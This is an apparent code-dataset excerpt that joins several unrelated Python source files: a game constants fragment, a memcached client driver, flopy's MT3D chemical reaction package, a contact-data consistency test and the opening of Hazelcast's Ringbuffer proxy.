Art_priest_3 = ['aqua_shield', 'flame_sword', 'katana_sword', 'bandit_sword', 'mage_hat', 'frost_staff']
Art_priest_4 = ['aqua_shield', 'flame_sword', 'katana_sword', 'bandit_sword', 'mage_hat', 'frost_staff']
Art_priest_5 = ['aqua_shield', 'flame_sword', 'katana_sword', 'bandit_sword', 'mage_hat', 'frost_staff']
Art_warrior_1 = ['aqua_shield', 'flame_sword', 'katana_sword', 'bandit_sword', 'mage_hat', 'frost_staff']
Art_warrior_2 = ['aqua_shield', 'flame_sword', 'katana_sword', 'bandit_sword', 'mage_hat', 'frost_staff']
Art_warrior_3 = ['aqua_shield', 'flame_sword', 'katana_sword', 'bandit_sword', 'mage_hat', 'frost_staff']
Art_warrior_4 = ['aqua_shield', 'flame_sword', 'katana_sword', 'bandit_sword', 'mage_hat', 'frost_staff']
Art_warrior_5 = ['aqua_shield', 'flame_sword', 'katana_sword', 'bandit_sword', 'mage_hat', 'frost_staff']
Art_rogue_1 = ['aqua_shield', 'flame_sword', 'katana_sword', 'bandit_sword', 'mage_hat', 'frost_staff']
Art_rogue_2 = ['aqua_shield', 'flame_sword', 'katana_sword', 'bandit_sword', 'mage_hat', 'frost_staff']
Art_rogue_3 = ['aqua_shield', 'flame_sword', 'katana_sword', 'bandit_sword', 'mage_hat', 'frost_staff']
Art_rogue_4 = ['aqua_shield', 'flame_sword', 'katana_sword', 'bandit_sword', 'mage_hat', 'frost_staff']
Art_rogue_5 = ['aqua_shield', 'flame_sword', 'katana_sword', 'bandit_sword', 'mage_hat', 'frost_staff']
Art_wizard = {1 : Art_wizard_1, 2 : Art_wizard_2, 3 : Art_wizard_3, 4 : Art_wizard_4, 5 : Art_wizard_5}
Art_priest = {1 : Art_priest_1, 2 : Art_priest_2, 3 : Art_priest_3, 4 : Art_priest_4, 5 : Art_priest_5}
Art_warrior = {1 : Art_warrior_1, 2 : Art_warrior_2, 3 : Art_warrior_3, 4 : Art_warrior_4, 5 : Art_warrior_5}
Art_rogue = {1 : Art_rogue_1, 2 : Art_rogue_2, 3 : Art_rogue_3, 4 : Art_rogue_4, 5 : Art_rogue_5}
Art_menu = {'wizard': Art_wizard, 'priest': Art_priest, 'warrior': Art_warrior, 'rogue': Art_rogue} | PFML239/Dungeon-defenders | const.py | Python | mit | 4,310 |
import six
import logging
from driver.connection import Connection
from driver.exceptions import *
from driver.protocol import *
log = logging.getLogger(__name__)
class Client(object):
""" Memcached client implementation with simple get and set methods
Args:
server: Connection parameters
Provides socket and protocol implementation for get and set commands.
To leverage parallel execution use ClientPool class.
"""
def __init__(self, server):
self._server = server
self._connection = Connection(server)
def connect(self):
"""
Open socket connection to memcached instance
"""
return self._connection.open()
def disconnect(self):
"""
Close socket connection to memcached instance
"""
self._connection.close()
def get(self, key):
"""
Executes get command
:param key: Key of the value to get
:return: Value for given key
"""
if not self._connection.socket:
self._connection.open()
command = b'get' +\
b' ' + _encode(key) +\
Constants.END_LINE
try:
self._connection.send(command)
except Exception as ex:
log.error("Command failed: %s" % str(command), ex)
self._connection.close()
return None
try:
response = self._connection.read()
except Exception as ex:
log.error("Failed to read response from socket", ex)
self._connection.close()
return None
log.debug("Received from socket: %s" % response)
result = _parse_get_response(response)
_check_for_errors(result[0])
if len(result) > 2:
return result[1]
raise DriverUnknownException(
"Received unexpected response from the memcached instance %s" % str(result))
def set(self, key, value, expire=0, noreply=True):
"""
Executes set command
:param key: Key of the value to set
:param value: String value
:param expire: Expire time with default value of never (0)
:param noreply: Indicates if client should wait for response
:return: Returns indication of a successful write
Set method execution time can benefit from skipping wait for reply
"""
if not self._connection.socket:
self._connection.open()
if not isinstance(value, six.binary_type):
try:
value = _encode(value)
except UnicodeEncodeError as e:
raise DriverConversionException(
"Failed to convert value to binary with exception: %s" % str(e))
flags = 0
arguments = b''
if noreply:
arguments += b' noreply'
if expire > Constants.MAXIMUM_TTL:
log.info("Using a value of TTL larger than max ttl. \
The value provided will be converted into unix timestamp for ttl timeout")
command = b'set' +\
b' ' + _encode(key) +\
b' ' + _encode(flags) +\
b' ' + _encode(expire) +\
b' ' + _encode(len(value)) +\
arguments + Constants.END_LINE +\
value + Constants.END_LINE
try:
self._connection.send(command)
except Exception as ex:
log.error("Command failed: %s" % str(command), ex)
self._connection.close()
return False
if noreply:
return True
try:
response = self._connection.read()
except Exception as ex:
log.error("Failed to read response from socket", ex)
self._connection.close()
return False
result = response.rstrip(Constants.END_LINE).split(Constants.END_LINE)
log.debug("Received from socket: %s" % response)
if result[0] == StoreReply.STORED:
log.debug("Successfully stored data")
return True
elif result[0] == StoreReply.EXISTS:
log.debug("Entry already exists")
return False
elif result[0] == StoreReply.NOT_STORED:
log.warn("Entry not stored for some reason")
return False
elif result[0] == StoreReply.NOT_FOUND:
log.warn("Received not found response")
return False
_check_for_errors(result[0])
raise DriverUnknownException(
"Received unexpected response from the memcached instance %s" % str(response))
def _encode(data):
return six.text_type(data).encode('ascii')
def _parse_get_response(response):
return response.split(Constants.END_LINE)
def _check_for_errors(result):
if result == Errors.ERROR:
message = "Received error response"
log.error(message)
raise DriverUnknownException(message)
elif result.startswith(Errors.SERVER_ERROR):
message = "Received server error with message: %s" % result[result.find(b' ') + 1:].decode("utf-8")
log.error(message)
raise DriverServerException(message)
elif result.startswith(Errors.CLIENT_ERROR):
message = "Received client error with message: %s" % result[result.find(b' ') + 1:].decode("utf-8")
log.error(message)
raise DriverClientException(message)
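# ---------------------------------------------------------------------------
# Minimal usage sketch (illustrative only, not part of the driver API). It
# assumes a reachable memcached instance and that Connection accepts the
# `server` argument in the (host, port) form shown here -- adjust to the
# actual Connection signature if it differs.
if __name__ == '__main__':
    client = Client(('127.0.0.1', 11211))  # hypothetical (host, port) tuple
    client.connect()
    # noreply=False makes set() wait for the server's STORED/NOT_STORED reply
    if client.set('greeting', 'hello', expire=60, noreply=False):
        print(client.get('greeting'))
    client.disconnect()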
| mgobec/python-memcached | driver/client.py | Python | apache-2.0 | 5,424 |
import sys
import numpy as np
from ..pakbase import Package
from ..utils import Util3d
class Mt3dRct(Package):
"""
Chemical reaction package class.
Parameters
----------
model : model object
The model object (of type :class:`flopy.mt3dms.mt.Mt3dms`) to which
this package will be added.
isothm : int
isothm is a flag indicating which type of sorption (or dual-domain mass
transfer) is simulated: isothm = 0, no sorption is simulated;
isothm = 1, linear isotherm (equilibrium-controlled); isothm = 2,
Freundlich isotherm (equilibrium-controlled); isothm = 3, Langmuir
isotherm (equilibrium-controlled); isothm = 4, first-order kinetic
sorption (nonequilibrium); isothm = 5, dual-domain mass transfer
(without sorption); isothm = 6, dual-domain mass transfer
(with sorption). (default is 0).
ireact : int
ireact is a flag indicating which type of kinetic rate reaction is
simulated: ireact = 0, no kinetic rate reaction is simulated;
ireact = 1, first-order irreversible reaction. Note that this reaction
package is not intended for modeling chemical reactions between
species. An add-on reaction package developed specifically for that
purpose may be used. (default is 0).
igetsc : int
igetsc is an integer flag indicating whether the initial concentration
for the nonequilibrium sorbed or immobile phase of all species should
be read when nonequilibrium sorption (isothm = 4) or dual-domain mass
transfer (isothm = 5 or 6) is simulated: igetsc = 0, the initial
concentration for the sorbed or immobile phase is not read. By default,
the sorbed phase is assumed to be in equilibrium with the dissolved
phase (isothm = 4), and the immobile domain is assumed to have zero
concentration (isothm = 5 or 6). igetsc > 0, the initial concentration
for the sorbed phase or immobile liquid phase of all species will be
read. (default is 1).
rhob : float or array of floats (nlay, nrow, ncol)
rhob is the bulk density of the aquifer medium (unit, ML-3). rhob is
used if isothm = 1, 2, 3, 4, or 6. If rhob is not user-specified and
        isothm is not 5 then rhob is set to 1.8e3. (default is None)
prsity2 : float or array of floats (nlay, nrow, ncol)
prsity2 is the porosity of the immobile domain (the ratio of pore
spaces filled with immobile fluids over the bulk volume of the aquifer
medium) when the simulation is intended to represent a dual-domain
system. prsity2 is used if isothm = 5 or 6. If prsity2 is not user-
specified and isothm = 5 or 6 then prsity2 is set to 0.1.
(default is None)
srconc : float or array of floats (nlay, nrow, ncol)
srconc is the user-specified initial concentration for the sorbed phase
of the first species if isothm = 4 (unit, MM-1). Note that for
equilibrium-controlled sorption, the initial concentration for the
sorbed phase cannot be specified. srconc is the user-specified initial
concentration of the first species for the immobile liquid phase if
isothm = 5 or 6 (unit, ML-3). If srconc is not user-specified and
isothm = 4, 5, or 6 then srconc is set to 0. (default is None).
sp1 : float or array of floats (nlay, nrow, ncol)
sp1 is the first sorption parameter for the first species. The use of
sp1 depends on the type of sorption selected (the value of isothm).
For linear sorption (isothm = 1) and nonequilibrium sorption (isothm =
4), sp1 is the distribution coefficient (Kd) (unit, L3M-1). For
Freundlich sorption (isothm = 2), sp1 is the Freundlich equilibrium
constant (Kf) (the unit depends on the Freundlich exponent a). For
Langmuir sorption (isothm = 3), sp1 is the Langmuir equilibrium
constant (Kl) (unit, L3M-1 ). For dual-domain mass transfer without
sorption (isothm = 5), sp1 is not used, but still must be entered. For
dual-domain mass transfer with sorption (isothm = 6), sp1 is also the
distribution coefficient (Kd) (unit, L3M-1). If sp1 is not specified
and isothm > 0 then sp1 is set to 0. (default is None).
sp2 : float or array of floats (nlay, nrow, ncol)
sp2 is the second sorption or dual-domain model parameter for the first
species. The use of sp2 depends on the type of sorption or dual-domain
model selected. For linear sorption (isothm = 1), sp2 is read but not
used. For Freundlich sorption (isothm = 2), sp2 is the Freundlich
exponent a. For Langmuir sorption (isothm = 3), sp2 is the total
concentration of the sorption sites available ( S ) (unit, MM-1). For
nonequilibrium sorption (isothm = 4), sp2 is the first-order mass
transfer rate between the dissolved and sorbed phases (unit, T-1). For
dual-domain mass transfer (isothm = 5 or 6), sp2 is the first-order
mass transfer rate between the two domains (unit, T-1). If sp2 is not
specified and isothm > 0 then sp2 is set to 0. (default is None).
rc1 : float or array of floats (nlay, nrow, ncol)
rc1 is the first-order reaction rate for the dissolved (liquid) phase
        for the first species (unit, T-1). rc1 is not used if ireact = 0. If a
dual-domain system is simulated, the reaction rates for the liquid
phase in the mobile and immobile domains are assumed to be equal. If
rc1 is not specified and ireact > 0 then rc1 is set to 0.
(default is None).
rc2 : float or array of floats (nlay, nrow, ncol)
rc2 is the first-order reaction rate for the sorbed phase for the first
        species (unit, T-1). rc2 is not used if ireact = 0. If a dual-domain
system is simulated, the reaction rates for the sorbed phase in the
mobile and immobile domains are assumed to be equal. Generally, if the
reaction is radioactive decay, rc2 should be set equal to rc1, while
for biodegradation, rc2 may be different from rc1. Note that rc2 is
read but not used, if no sorption is included in the simulation. If
rc2 is not specified and ireact > 0 then rc2 is set to 0.
(default is None).
extension : string
Filename extension (default is 'rct')
unitnumber : int
File unit number. If file unit number is None then an unused unit
        number is used. (default is None).
**kwargs
--------
srconcn : float or array of floats (nlay, nrow, ncol)
srconcn is the user-specified initial concentration for the sorbed
phase of species n. If srconcn is not passed as a **kwarg and
isothm = 4, 5, or 6 then srconc for species n is set to 0.
See description of srconc for a more complete description of srconcn.
sp1n : float or array of floats (nlay, nrow, ncol)
sp1n is the first sorption parameter for species n. If sp1n is not
passed as a **kwarg and isothm > 0 then sp1 for species n is set to 0.
See description of sp1 for a more complete description of sp1n.
sp2n : float or array of floats (nlay, nrow, ncol)
sp2n is the second sorption or dual-domain model parameter for species
n. If sp2n is not passed as a **kwarg and isothm > 0 then sp2 for
species n is set to 0. See description of sp2 for a more complete
description of sp2n.
rc1n : float or array of floats (nlay, nrow, ncol)
rc1n is the first-order reaction rate for the dissolved (liquid) phase
for species n. If rc1n is not passed as a **kwarg and ireact > 0 then
rc1 for species n is set to 0. See description of rc1 for a more
complete description of rc1n.
rc2n : float or array of floats (nlay, nrow, ncol)
rc2n is the first-order reaction rate for the sorbed phase for species
n. If rc2n is not passed as a **kwarg and ireact > 0 then rc2 for
species n is set to 0. See description of rc2 for a more complete
description of rc2n.
extension : string
Filename extension (default is 'rct')
unitnumber : int
File unit number (default is None).
filenames : str or list of str
Filenames to use for the package. If filenames=None the package name
will be created using the model name and package extension. If a
single string is passed the package will be set to the string.
Default is None.
Attributes
----------
Methods
-------
See Also
--------
Notes
-----
Examples
--------
>>> import flopy
>>> mt = flopy.mt3dms.Mt3dms()
>>> rct = flopy.mt3dms.Mt3dRct(mt)
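    >>> # Illustrative sketch (not from the original docs): for a model whose
    >>> # BTN package defines ncomp = 2, per-species values are passed as
    >>> # keyword arguments whose names carry the species index,
    >>> # e.g. sp12, rc12, srconc2.
    >>> rct2 = flopy.mt3dms.Mt3dRct(mt, isothm=1, sp1=0.5, sp12=0.3)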
"""
def __init__(self, model, isothm=0, ireact=0, igetsc=1, rhob=None,
prsity2=None, srconc=None, sp1=None, sp2=None, rc1=None,
rc2=None, extension='rct', unitnumber=None,
filenames=None, **kwargs):
"""
Package constructor.
"""
if unitnumber is None:
unitnumber = Mt3dRct.defaultunit()
elif unitnumber == 0:
unitnumber = Mt3dRct.reservedunit()
# set filenames
if filenames is None:
filenames = [None]
elif isinstance(filenames, str):
filenames = [filenames]
# Fill namefile items
name = [Mt3dRct.ftype()]
units = [unitnumber]
extra = ['']
# set package name
fname = [filenames[0]]
# Call ancestor's init to set self.parent, extension, name and unit number
Package.__init__(self, model, extension=extension, name=name,
unit_number=units, extra=extra, filenames=fname)
nrow = model.nrow
ncol = model.ncol
nlay = model.nlay
ncomp = model.ncomp
# Item E1: ISOTHM, IREACT, IRCTOP, IGETSC
self.isothm = isothm
self.ireact = ireact
self.irctop = 2 # All RCT vars are specified as 3D arrays
self.igetsc = igetsc
# Item E2A: RHOB
if rhob is None:
rhob = 1.8e3
self.rhob = Util3d(model, (nlay, nrow, ncol), np.float32, rhob,
name='rhob', locat=self.unit_number[0],
array_free_format=False)
# Item E2B: PRSITY
if prsity2 is None:
prsity2 = 0.1
self.prsity2 = Util3d(model, (nlay, nrow, ncol), np.float32, prsity2,
name='prsity2', locat=self.unit_number[0],
array_free_format=False)
# Item E2C: SRCONC
if srconc is None:
srconc = 0.0
self.srconc = []
u3d = Util3d(model, (nlay, nrow, ncol), np.float32, srconc,
name='srconc1', locat=self.unit_number[0],
array_free_format=False)
self.srconc.append(u3d)
if ncomp > 1:
for icomp in range(2, ncomp + 1):
name = "srconc" + str(icomp)
val = 0.0
if name in kwargs:
val = kwargs.pop(name)
else:
print("RCT: setting srconc for component " +
str(icomp) + " to zero, kwarg name " +
name)
u3d = Util3d(model, (nlay, nrow, ncol), np.float32, val,
name=name, locat=self.unit_number[0],
array_free_format=False)
self.srconc.append(u3d)
# Item E3: SP1
if sp1 is None:
sp1 = 0.0
self.sp1 = []
u3d = Util3d(model, (nlay, nrow, ncol), np.float32, sp1, name='sp11',
locat=self.unit_number[0], array_free_format=False)
self.sp1.append(u3d)
if ncomp > 1:
for icomp in range(2, ncomp + 1):
name = "sp1" + str(icomp)
val = 0.0
if name in kwargs:
val = kwargs.pop(name)
else:
print("RCT: setting sp1 for component " +
str(icomp) + " to zero, kwarg name " +
name)
u3d = Util3d(model, (nlay, nrow, ncol), np.float32, val,
name=name, locat=self.unit_number[0],
array_free_format=False)
self.sp1.append(u3d)
# Item E4: SP2
if sp2 is None:
sp2 = 0.0
self.sp2 = []
u3d = Util3d(model, (nlay, nrow, ncol), np.float32, sp2, name='sp21',
locat=self.unit_number[0], array_free_format=False)
self.sp2.append(u3d)
if ncomp > 1:
for icomp in range(2, ncomp + 1):
name = "sp2" + str(icomp)
val = 0.0
if name in kwargs:
val = kwargs.pop(name)
else:
print("RCT: setting sp2 for component " +
str(icomp) + " to zero, kwarg name " +
name)
u3d = Util3d(model, (nlay, nrow, ncol), np.float32, val,
name=name, locat=self.unit_number[0],
array_free_format=False)
self.sp2.append(u3d)
# Item E5: RC1
if rc1 is None:
rc1 = 0.0
self.rc1 = []
u3d = Util3d(model, (nlay, nrow, ncol), np.float32, rc1, name='rc11',
locat=self.unit_number[0], array_free_format=False)
self.rc1.append(u3d)
if ncomp > 1:
for icomp in range(2, ncomp + 1):
name = "rc1" + str(icomp)
val = 0.0
if name in kwargs:
val = kwargs.pop(name)
else:
print("RCT: setting rc1 for component " +
str(icomp) + " to zero, kwarg name " +
name)
u3d = Util3d(model, (nlay, nrow, ncol), np.float32, val,
name=name, locat=self.unit_number[0],
array_free_format=False)
self.rc1.append(u3d)
# Item E4: RC2
if rc2 is None:
rc2 = 0.0
self.rc2 = []
u3d = Util3d(model, (nlay, nrow, ncol), np.float32, rc2, name='rc21',
locat=self.unit_number[0], array_free_format=False)
self.rc2.append(u3d)
if ncomp > 1:
for icomp in range(2, ncomp + 1):
name = "rc2" + str(icomp)
val = 0.0
if name in kwargs:
val = kwargs.pop(name)
else:
print("RCT: setting rc2 for component " +
str(icomp) + " to zero, kwarg name " +
name)
u3d = Util3d(model, (nlay, nrow, ncol), np.float32, val,
name=name, locat=self.unit_number[0],
array_free_format=False)
self.rc2.append(u3d)
# Check to make sure that all kwargs have been consumed
if len(list(kwargs.keys())) > 0:
raise Exception("RCT error: unrecognized kwargs: " +
' '.join(list(kwargs.keys())))
self.parent.add_package(self)
return
def __repr__(self):
return 'Chemical reaction package class'
def write_file(self):
"""
Write the package file
Returns
-------
None
"""
# Open file for writing
f_rct = open(self.fn_path, 'w')
f_rct.write('%10i%10i%10i%10i\n' % (self.isothm, self.ireact,
self.irctop, self.igetsc))
if (self.isothm in [1, 2, 3, 4, 6]):
f_rct.write(self.rhob.get_file_entry())
if (self.isothm in [5, 6]):
f_rct.write(self.prsity2.get_file_entry())
if (self.igetsc > 0):
for icomp in range(len(self.srconc)):
f_rct.write(self.srconc[icomp].get_file_entry())
if (self.isothm > 0):
for icomp in range(len(self.sp1)):
f_rct.write(self.sp1[icomp].get_file_entry())
if (self.isothm > 0):
for icomp in range(len(self.sp2)):
f_rct.write(self.sp2[icomp].get_file_entry())
if (self.ireact > 0):
for icomp in range(len(self.rc1)):
f_rct.write(self.rc1[icomp].get_file_entry())
if (self.ireact > 0):
for icomp in range(len(self.rc2)):
f_rct.write(self.rc2[icomp].get_file_entry())
f_rct.close()
return
@staticmethod
def load(f, model, nlay=None, nrow=None, ncol=None, ncomp=None,
ext_unit_dict=None):
"""
Load an existing package.
Parameters
----------
f : filename or file handle
File to load.
model : model object
The model object (of type :class:`flopy.mt3d.mt.Mt3dms`) to
which this package will be added.
nlay : int
Number of model layers in the reaction package. If nlay is not
specified, the number of layers in the passed model object is
used. (default is None).
nrow : int
Number of model rows in the reaction package. If nrow is not
specified, the number of rows in the passed model object is
used. (default is None).
ncol : int
            Number of model columns in the reaction package. If ncol is not
            specified, the number of columns in the passed model object is
            used. (default is None).
        ncomp : int
            Number of species in the reaction package. If ncomp is not
            specified, the number of species in the passed model object is
            used. (default is None).
ext_unit_dict : dictionary, optional
If the arrays in the file are specified using EXTERNAL,
or older style array control records, then `f` should be a file
handle. In this case ext_unit_dict is required, which can be
constructed using the function
:class:`flopy.utils.mfreadnam.parsenamefile`.
Returns
-------
rct : Mt3dRct object
Mt3dRct object.
Examples
--------
>>> import flopy
>>> mt = flopy.mt3d.Mt3dms()
>>> rct = flopy.mt3d.Mt3dRct.load('test.rct', mt)
"""
if model.verbose:
sys.stdout.write('loading rct package file...\n')
# Open file, if necessary
if not hasattr(f, 'read'):
filename = f
f = open(filename, 'r')
# Set dimensions if necessary
if nlay is None:
nlay = model.nlay
if nrow is None:
nrow = model.nrow
if ncol is None:
ncol = model.ncol
if ncomp is None:
ncomp = model.ncomp
# Setup kwargs to store multispecies information
kwargs = {}
# Item E1
line = f.readline()
if model.verbose:
print(' loading ISOTHM, IREACT, IRCTOP, IGETSC...')
isothm = int(line[0:10])
ireact = int(line[11:20])
try:
irctop = int(line[21:30])
except:
irctop = 0
try:
igetsc = int(line[31:40])
except:
igetsc = 0
if model.verbose:
print(' ISOTHM {}'.format(isothm))
print(' IREACT {}'.format(ireact))
print(' IRCTOP {}'.format(irctop))
print(' IGETSC {}'.format(igetsc))
# Item E2A: RHOB
rhob = None
if model.verbose:
print(' loading RHOB...')
if isothm in [1, 2, 3, 4, 6]:
rhob = Util3d.load(f, model, (nlay, nrow, ncol), np.float32,
'rhob', ext_unit_dict, array_format="mt3d")
if model.verbose:
print(' RHOB {}'.format(rhob))
# Item E2A: PRSITY2
prsity2 = None
if model.verbose:
print(' loading PRSITY2...')
if isothm in [5, 6]:
prsity2 = Util3d.load(f, model, (nlay, nrow, ncol), np.float32,
'prsity2', ext_unit_dict,
array_format="mt3d")
if model.verbose:
print(' PRSITY2 {}'.format(prsity2))
# Item E2C: SRCONC
srconc = None
if model.verbose:
print(' loading SRCONC...')
if igetsc > 0:
srconc = Util3d.load(f, model, (nlay, nrow, ncol), np.float32,
'srconc1', ext_unit_dict, array_format="mt3d")
if model.verbose:
print(' SRCONC {}'.format(srconc))
if ncomp > 1:
for icomp in range(2, ncomp + 1):
name = "srconc" + str(icomp)
if model.verbose:
print(' loading {}...'.format(name))
u3d = Util3d.load(f, model, (nlay, nrow, ncol), np.float32,
name, ext_unit_dict, array_format="mt3d")
kwargs[name] = u3d
if model.verbose:
print(' SRCONC{} {}'.format(icomp, u3d))
# Item E3: SP1
sp1 = None
if model.verbose:
print(' loading SP1...')
if isothm > 0:
sp1 = Util3d.load(f, model, (nlay, nrow, ncol), np.float32,
'sp11', ext_unit_dict, array_format="mt3d")
if model.verbose:
print(' SP1 {}'.format(sp1))
if ncomp > 1:
for icomp in range(2, ncomp + 1):
name = "sp1" + str(icomp)
if model.verbose:
print(' loading {}...'.format(name))
u3d = Util3d.load(f, model, (nlay, nrow, ncol), np.float32,
name, ext_unit_dict, array_format="mt3d")
kwargs[name] = u3d
if model.verbose:
print(' SP1{} {}'.format(icomp, u3d))
# Item E4: SP2
sp2 = None
if model.verbose:
print(' loading SP2...')
if isothm > 0:
sp2 = Util3d.load(f, model, (nlay, nrow, ncol), np.float32,
'sp21', ext_unit_dict, array_format="mt3d")
if model.verbose:
print(' SP2 {}'.format(sp2))
if ncomp > 1:
for icomp in range(2, ncomp + 1):
name = "sp2" + str(icomp)
if model.verbose:
print(' loading {}...'.format(name))
u3d = Util3d.load(f, model, (nlay, nrow, ncol), np.float32,
name, ext_unit_dict, array_format="mt3d")
kwargs[name] = u3d
if model.verbose:
print(' SP2{} {}'.format(icomp, u3d))
# Item E5: RC1
rc1 = None
if model.verbose:
print(' loading RC1...')
if ireact > 0:
rc1 = Util3d.load(f, model, (nlay, nrow, ncol), np.float32,
'rc11', ext_unit_dict,
array_format="mt3d")
if model.verbose:
print(' RC1 {}'.format(rc1))
if ncomp > 1:
for icomp in range(2, ncomp + 1):
name = "rc1" + str(icomp)
if model.verbose:
print(' loading {}...'.format(name))
u3d = Util3d.load(f, model, (nlay, nrow, ncol), np.float32,
name, ext_unit_dict, array_format="mt3d")
kwargs[name] = u3d
if model.verbose:
print(' RC1{} {}'.format(icomp, u3d))
# Item E6: RC2
rc2 = None
if model.verbose:
print(' loading RC2...')
if ireact > 0:
rc2 = Util3d.load(f, model, (nlay, nrow, ncol), np.float32,
'rc21', ext_unit_dict, array_format="mt3d")
if model.verbose:
print(' RC2 {}'.format(rc2))
if ncomp > 1:
for icomp in range(2, ncomp + 1):
name = "rc2" + str(icomp)
if model.verbose:
print(' loading {}...'.format(name))
u3d = Util3d.load(f, model, (nlay, nrow, ncol), np.float32,
name, ext_unit_dict, array_format="mt3d")
kwargs[name] = u3d
if model.verbose:
print(' RC2{} {}'.format(icomp, u3d))
# Close the file
f.close()
# set package unit number
unitnumber = None
filenames = [None]
if ext_unit_dict is not None:
unitnumber, filenames[0] = \
model.get_ext_dict_attr(ext_unit_dict,
filetype=Mt3dRct.ftype())
# Construct and return rct package
rct = Mt3dRct(model, isothm=isothm, ireact=ireact, igetsc=igetsc,
rhob=rhob, prsity2=prsity2, srconc=srconc, sp1=sp1,
sp2=sp2, rc1=rc1, rc2=rc2, unitnumber=unitnumber,
filenames=filenames)
return rct
@staticmethod
def ftype():
return 'RCT'
@staticmethod
def defaultunit():
return 36
@staticmethod
def reservedunit():
return 8
| bdestombe/flopy-1 | flopy/mt3d/mtrct.py | Python | bsd-3-clause | 26,430 |
import re
from models.contact import Contact
def test_all_contacts_on_homepage(app, db):
if app.contact.count() == 0:
app.contact.add(Contact(first_name="Mister", last_name="Muster", mobile_phone="123", email_1="[email protected]"))
contacts_from_homepage = sorted(app.contact.get_contact_list(), key = Contact.contact_id_or_max)
contacts_from_db = sorted(db.get_contact_list(), key = Contact.contact_id_or_max)
for i in range(len(contacts_from_homepage)):
hp_contact=contacts_from_homepage[i]
db_contact=contacts_from_db[i]
assert hp_contact.first_name == db_contact.first_name
assert hp_contact.last_name == db_contact.last_name
assert clear_address(hp_contact.address) == clear_address(db_contact.address)
assert clear_phone(hp_contact.all_phones_homepage) == clear_phone(merge_phones_homepage(db_contact))
assert hp_contact.all_emails_homepage == merge_emails_homepage(db_contact)
print("Successfully verified %s contacts vs Database" % str(len(contacts_from_homepage)))
"""def test_contact_on_homepage(app):
if app.contact.count() == 0:
app.contact.add(Contact(first_name="Mister", last_name="Muster", mobile_phone="123", email_1="[email protected]"))
index = randrange(len(app.contact.get_contact_list()))
contact_from_homepage = app.contact.get_contact_list()[index]
contact_from_editpage = app.contact.get_contact_data_editpage(index)
assert contact_from_homepage.first_name == contact_from_editpage.first_name
assert contact_from_homepage.last_name == contact_from_editpage.last_name
assert contact_from_homepage.address == contact_from_editpage.address
assert contact_from_homepage.all_phones_homepage == merge_phones_homepage(contact_from_editpage)
assert contact_from_homepage.all_emails_homepage == merge_emails_homepage(contact_from_editpage)"""
"""def test_phones_on_viewpage(app):
contact_from_viewpage = app.contact.get_contact_data_viewpage(0)
contact_from_editpage = app.contact.get_contact_data_editpage(0)
assert contact_from_viewpage.home_phone == contact_from_editpage.home_phone
assert contact_from_viewpage.work_phone == contact_from_editpage.work_phone
assert contact_from_viewpage.mobile_phone == contact_from_editpage.mobile_phone
assert contact_from_viewpage.fax == contact_from_editpage.fax"""
def clear(s):
#return "".join(symbol for symbol in s if symbol not in "[]()- 0")
return re.sub("[- ()]", "", s)
def clear_phone(number):
return re.sub("0", "", number)
def clear_address(address):
return re.sub("[\n\r\s+]", "", address)
def merge_phones_homepage(contact):
return "\n".join(filter(lambda x: x != "",
map(lambda x: clear(x),
filter(lambda x: x is not None,
[contact.home_phone, contact.mobile_phone, contact.work_phone]))))
def merge_emails_homepage(contact):
return "\n".join(filter(lambda x: x != "", filter(lambda x: x is not None,
[contact.email_1, contact.email_2, contact.email_3])))
| rgurevych/python_for_testers | tests/test_contacts_data_compliance.py | Python | apache-2.0 | 3,163 |
from hazelcast.future import ImmediateFuture, Future
from hazelcast.protocol.codec import (
ringbuffer_add_all_codec,
ringbuffer_add_codec,
ringbuffer_capacity_codec,
ringbuffer_head_sequence_codec,
ringbuffer_read_many_codec,
ringbuffer_read_one_codec,
ringbuffer_remaining_capacity_codec,
ringbuffer_size_codec,
ringbuffer_tail_sequence_codec,
)
from hazelcast.proxy.base import PartitionSpecificProxy
from hazelcast.util import (
check_not_negative,
check_not_none,
check_not_empty,
check_true,
ImmutableLazyDataList,
)
OVERFLOW_POLICY_OVERWRITE = 0
"""
Configuration property for the DEFAULT overflow policy. When an item is added to a full Ringbuffer, the oldest item in
the Ringbuffer is overwritten and the new item is added.
"""
OVERFLOW_POLICY_FAIL = 1
"""
Configuration property for the FAIL overflow policy. When an item is added to a full Ringbuffer, the call fails and the
item is not added.
The reason that FAIL exists is to give the opportunity to obey the ttl. If blocking behavior is required, it can be
implemented using retries in combination with an exponential backoff.
>>> sleepMS = 100
>>> while True:
>>>     result = ringbuffer.add(item, OVERFLOW_POLICY_FAIL)
>>>     if result != -1:
>>>         break
>>>     sleep(sleepMS / 1000)
>>>     sleepMS *= 2
"""
MAX_BATCH_SIZE = 1000
"""
The maximum number of items to be added to RingBuffer or read from RingBuffer at a time.
"""
class Ringbuffer(PartitionSpecificProxy):
"""A Ringbuffer is an append-only data-structure where the content is
stored in a ring like structure.
A ringbuffer has a capacity so it won't grow beyond that capacity and
    endanger the stability of the system. If that capacity is exceeded, then
the oldest item in the ringbuffer is overwritten. The ringbuffer has two
always incrementing sequences:
- :func:`tail_sequence`: This is the side where the youngest item is found.
So the tail is the side of the ringbuffer where items are added to.
- :func:`head_sequence`: This is the side where the oldest items are found.
      So the head is the side where items get discarded.
The items in the ringbuffer can be found by a sequence that is in between
(inclusive) the head and tail sequence.
If data is read from a ringbuffer with a sequence that is smaller than the
head sequence, it means that the data is not available anymore and a
:class:`hazelcast.errors.StaleSequenceError` is thrown.
A Ringbuffer currently is a replicated, but not partitioned data structure.
So all data is stored in a single partition, similarly to the
:class:`hazelcast.proxy.queue.Queue` implementation.
A Ringbuffer can be used in a way similar to the Queue, but one of the key
differences is that a :func:`hazelcast.proxy.queue.Queue.take` is destructive,
meaning that only 1 thread is able to take an item. A :func:`read_one` is not
destructive, so you can have multiple threads reading the same item multiple
times.
"""
def __init__(self, service_name, name, context):
super(Ringbuffer, self).__init__(service_name, name, context)
self._capacity = None
def capacity(self):
"""Returns the capacity of this Ringbuffer.
Returns:
hazelcast.future.Future[int]: The capacity of Ringbuffer.
"""
if not self._capacity:
def handler(message):
self._capacity = ringbuffer_capacity_codec.decode_response(message)
return self._capacity
request = ringbuffer_capacity_codec.encode_request(self.name)
return self._invoke(request, handler)
return ImmediateFuture(self._capacity)
def size(self):
"""Returns number of items in the Ringbuffer.
Returns:
hazelcast.future.Future[int]: The size of Ringbuffer.
"""
request = ringbuffer_size_codec.encode_request(self.name)
return self._invoke(request, ringbuffer_size_codec.decode_response)
def tail_sequence(self):
"""Returns the sequence of the tail.
The tail is the side of the Ringbuffer where the items are added to.
The initial value of the tail is ``-1``.
Returns:
hazelcast.future.Future[int]: The sequence of the tail.
"""
